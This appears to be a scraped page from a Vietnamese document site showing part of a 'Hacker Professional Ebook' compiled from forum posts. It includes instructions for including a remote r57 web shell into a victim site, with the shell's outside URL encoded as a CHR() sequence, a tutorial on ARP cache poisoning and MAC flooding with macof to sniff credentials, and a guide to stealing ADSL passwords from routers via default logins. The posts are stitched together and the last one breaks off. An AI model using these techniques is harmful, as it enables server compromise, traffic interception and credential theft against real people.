1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 212 ppt

6 132 0

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 308,84 KB

Nội dung

Dựa vào trên thì đã hiểu đoạn này chưa ; mỗi người một khác vì là link shell để include khác nhau; nhưng cái đoạn đầu thế nào cũng giống nhau vì đoạn đầu là đoạn http:// mà Trích: Mong các bác Mod có 1 tut về shell và mong mọi người đừng cười em Bác nào tốt bụng có thể chỉ em cách tạo 1 con "shell" hoàn chỉnh cho riêng em được hum ? Thank to all ! Để code được một shell hoàn chỉnh đầy đủ tính năng, sức mạnh, cũng phức tạp đó :| Nhưng có thể thí nghiệm một shell nguyên thủy, cực kì đơn giản là: Tạo một form html (một text Box thôi) dùng để gõ lệnh ấy mà. Trong kịch bản đó sử dụng hàm shell_exec() để call lệnh của hệ điều hành. Vậy thui nhé, học những kiến thức cơ bản đã; MicrosoftX(vniss) Trích: Nguyên văn bởi litva Ý em hỏi là shell phải up lên 1 host hỗ trợ php trước giống như của anh Rek là http://rekcor.info/r57.txt sau đó mới include vào host của victim phải hum ? Đuôi của nó là TXT kìa cần chi host hỗ trợ PHP nhẩy Trích: Nguyên văn bởi litva Em chưa có link của em (Nhỡ dùng link trên mà die thì làm sao ạ ), Tìm cái host nào đó mà úp lên, dò mã ASCII của các kí tự đi rồi mã hóa link mình theo cách trên; đọc kĩ đi mà Trích: Nguyên văn bởi litva *.txt cũng thực hiện được các câu lệnh SQL phải hum ? Câu này thì chả hiểu gì cả *.txt là phần mở rộng của tệp tin :| nó liên quan j` đến thực hiện câu lệnh của SQL nhỉ @habogay : Bác hình như trước là Mod của box Programming thì phải MicrosoftX(vniss) Trích: Ở đây 104 là mã ASCII kí tự h, 116 ;à t, 112 là p, 58 là dấu :, 47 là dấu / đó cứ thế mà dịch nếu you có link khác thì cũng dựa theo đó mà dịch Cái này thì em hiểu rùi Bây giờ em đã down được r57 shell với đuôi php về nè, đang lưu trong ổ cứng E tên là r57shell.php. Típ theo em phải đưa nó lên host, giả sử mượn của anh Rek http://rekcor.info/r57shell.php Dịch ra mã ASCII là Code: CHR(104).CHR(116).CHR(116).CHR(112).CHR(58).CHR(47).CHR(47).CHR(11 4).CHR(101).CHR(107).CHR(99).CHR(111).CHR(114).CHR(46).CHR(105).CH R(110).CHR(102).CHR(111).CHR(47).CHR(114).CHR(53).CHR(55).CHR(115). CHR(104).CHR(101).CHR(108).CHR(108).CHR(46).CHR(112).CHR(104).CHR( 112) Sau đó mới include vào host của victim qua đoạn mã trên Hay là vào được ACP rùi úp thẳng con shell từ ổ E lên ? PS : Em úp lên với đuôi .txt như của anh Rek được không ? MicrosoftX(vniss) Sniffing for dummies hì hôm nay mình giới thiệu với các bạn một kĩ thuật hacking cơ bản đó là sniff.(có nhiều bạn chưa biết cái này - ai biết rồi thì đừng chê nha) Nói đến Sniff nhiều người nghĩ ngay đến ethereal hay tcpdump (hoặc đơn giản chỉ là một công cụ nào đó cho phép ta làm việc tương tự).Nhưng theo tôi Sniff là một kĩ thuật được hiện thực bằng các công cụ cho phép ta theo dõi network traffic của một mạng máy tính và lấy đi nhưng thông tin quan trọng.Những thông tin này thường là nhưng thông tin chứng thực(username,password) mà từ đó có thể truy cập đến một hệ thống,tài nguyên nào đó (ví dụ như tài khoản ngân hàng trực tuyến ). Hiện nay có rất nhiều công cụ giúp ta làm việc này như: ettercap,dsniff,wireshark(ethereal),tcpdump Như các bạn đã biết một máy tính khi connect vào mạng LAN sẽ có 2 address là : IP address và MAC address. Khi một IP datagram được gửi đi từ trạm này sang trạm khác trong cùng một mạng LAN,IP address của trạm đích phải được chuyển đổi sang MAC address. Giao thức ARP sẽ giúp ta làm việc này. Giao thức ARP sử dụng 32 bit IP address ở trong 48 bit ethernet address.Công việc của nó là gửi các broadcast request đến tất cả các máy trong cùng ethernet.Một packer request sẽ có IP address của sender muốn liên lạc, Một frame của ARP request có nội dung như sau: Code: 01:20:14.833350 arp who-has 192.168.0.66 tell 192.168.0.62 và tất cả các máy trong mạng sẽ bỏ qua packet này chỉ máy tính nào có IP address trùng với IP address trong request thì nó sẽ reply lại cho sender một packet cùng với ethernet address: Code: 01:20:14.833421 arp reply 192.168.0.66 is-at 0:0:d1:1f:3f:f1 Ngày trước những máy tính được nối với nhau thông qua môi trường dùng chung (Tức là dùng HUB đó ).Trong mạng dùng HUB Traffic sẽ đến tất cả các máy trong network. Đây là một điều không an toàn,với traffic đến toàn bộ các máy trong mạng chúng ta sẽ dễ dàng sniffing mà lấy đi những thứ quan trọng. Ngày nay những máy tính được nối với nhau bởi Switch,Switch thông minh hơn Hub, traffic sẽ không đên tất cả các máy tính nữa mà nó sẽ đến nơi cần đến là đủ. Điều đó Kéo theo những chúng ta cũng phải thay đổi đôi chút trong việc tấn công,phải có một sự dàn dựng tốt hơn. 1.ARP Spoofing Vì bản thân ARP request đã chứa địa chỉ vật lý của sender trong Ethernet frame nên receiver nhận được ARP request này hoàn toàn có thể trả lời cho sender mà không cần phải tạo một ARP request nữa. Tuy nhiên, điểm yếu lớn nhất của giao thức ARP là ở chỗ nó là một stateless protocol, có nghĩa là nó sẽ không theo dõi các frame trả lời cho các request mà nó đã gửi, và vì thế sẽ chấp nhận các ARP reply mà trước đó không có request. Nếu một kẻ nào đó muốn lấy cắp thông tin từ một trạm khác, attacker sẽ gửi các ARP reply giả mạo phù hợp một địa chỉ IP nào đó đã chọn trước với địa chỉ MAC của chúng. Trạm nhận được các ARP reply giả mạo này không thể phân biệt được nó là ARP reply hợp lệ hay không, và bắt đầu gửi dữ liệu tới địa chỉ MAC của attacker. Một điểm yếu nữa của giao thức ARP đó là bảng thông tin ARP được lưu trữ cục bộ tại mỗi trạm trong một mạng. Điều này nhằm mục đích tăng tốc độ truyền dữ liệu bởi vì địa chỉ MAC sẽ không cần phải kiểm tra mỗi lần một thiết bị này muốn liên lạc với một thiết bị khác. Một kẻ tấn công muốn tiếp tục giả mạo một địa chỉ IP nào đó, nó cần phải Flood trạm đó với các ARP reply ghi đè lên các ARP hợp lệ từ trạm nguồn. Kiểu tấn công này thường được biết đến với cái tên ARP cache poisoning. Có nhiều tool sử dụng kỹ thuật này để Sniff thông tin trên các mạng dùng switch như Ettercap. Tham khảo tại: http://ettercap.sourceforge.net/ arpoison tham khảo tại : http://arpoison.sourceforge.net/ Trên windows tham khảo: WinARP Spoofer tại www.nextsecurity.net hì còn nhiều lắm mà chỉ cần vài cái đó là đủ sài rồi Để chặn luồng thông tin giữa 2 trạm A và B, trạm C sẽ đầu độc (poison) ARP cache của trạm A, làm cho nó nhầm tưởng là địa chỉ IP của trạm B giống với địa chỉ MAC của trạm C (chứ không phải là địa chỉ MAC của B). Sau đó C sẽ poison bộ cache của B, làm cho nó nhầm tưởng địa chỉ IP của trạm A tương ứng với địa chỉ MAC của C (chứ không phải địa chỉ MAC của A). 2.MAC Flooding Như bạn đã biết Switch thông minh hơn HUB là ở chỗ: Khi một packet được gửi từ máy A sang máy B thì thay vì gửi đi đến tất cả các máy trong mạng như Hub,switch chỉ gửi packet đó đến máy B mà thôi.Làm được việc này là do switch dựa vào một bảng dịch (bảng này sẽ qui đinh một địa chỉ MAC sẽ được truyền trên một công vật lý của switch) . Thế nhưng Switch chỉ cung cấp 1 bộ nhớ có hạn cho việc này,đây chính là điểm yếu để ta khai thác, nếu ta gửi liên tiếp các địa chỉ MAC giả mạo đến cho Switch và với bộ nhớ có hạn đó điều gì sẽ xẩy ra.Một công cụ tốt để làm việc này là: macof (một tools trong bộ công cụ dsniff) [root@localhost]# macof Code: 77:6b:e1:6e:5e:8c 93:2d:ed:45:f9:e3 0.0.0.0.45702 > 0.0.0.0.11000: S 1847390231:1847390231(0) win 512 84:a4:d3:57:ef:8 12:56:52:42:dc:95 0.0.0.0.16630 > 0.0.0.0.3031: S 1484147693:1484147693(0) win 512 88:f0:9:3f:18:89 d:86:53:53:d7:f8 0.0.0.0.15535 > 0.0.0.0.7466: S 293820390:293820390(0) win 512 Trong khi chúng ta chạy macof thì cái switch cũng như cái hub mà thôi Lúc này chúng ta dễ dàng sniff trong mạng đó. zeno(VNISS) Hướng dẫn chôm pass của ADSL Hic, máy nhà em chạy ADSL MEGAVNN với cái con router là :micronet j` j` í. Theo em, chẳng riêng j` con này, khối con khác AE có thể chôm pass ADSL +) Ra hàng chôm nè +) Sang nhà thằng bạn nào đấy giàu có một chút, thôi thì anh em với nhau, tao nhờ ông bà bô mày trả hộ ít xiền OK ! Let's go DiSclamer : hik, dinhcaohack viết bài này để mọi ng` cẩn thận nhớ đổi pass hik không có ý niệm j` xấu đâu ++++ Bước 1: http://10.0.0.2 -> Ai cũng biết đây là cái default gateway đúng k0 ++++ Bước 2: user : admin pass: epicrouter < Đây là pass mặc định của router khối thằng đek; mún change và ngại change hik hik ngu thì chết > Có thể nữa là : user : user pass: pass/password user : root pass: root OK ++++ Bước 3: Vô Wan thấy username là dinhcaohack roài nhé hik sao pass lại thành*******

Ngày đăng: 04/07/2014, 12:20

TỪ KHÓA LIÊN QUAN

TÀI LIỆU CÙNG NGƯỜI DÙNG

  • Đang cập nhật ...

TÀI LIỆU LIÊN QUAN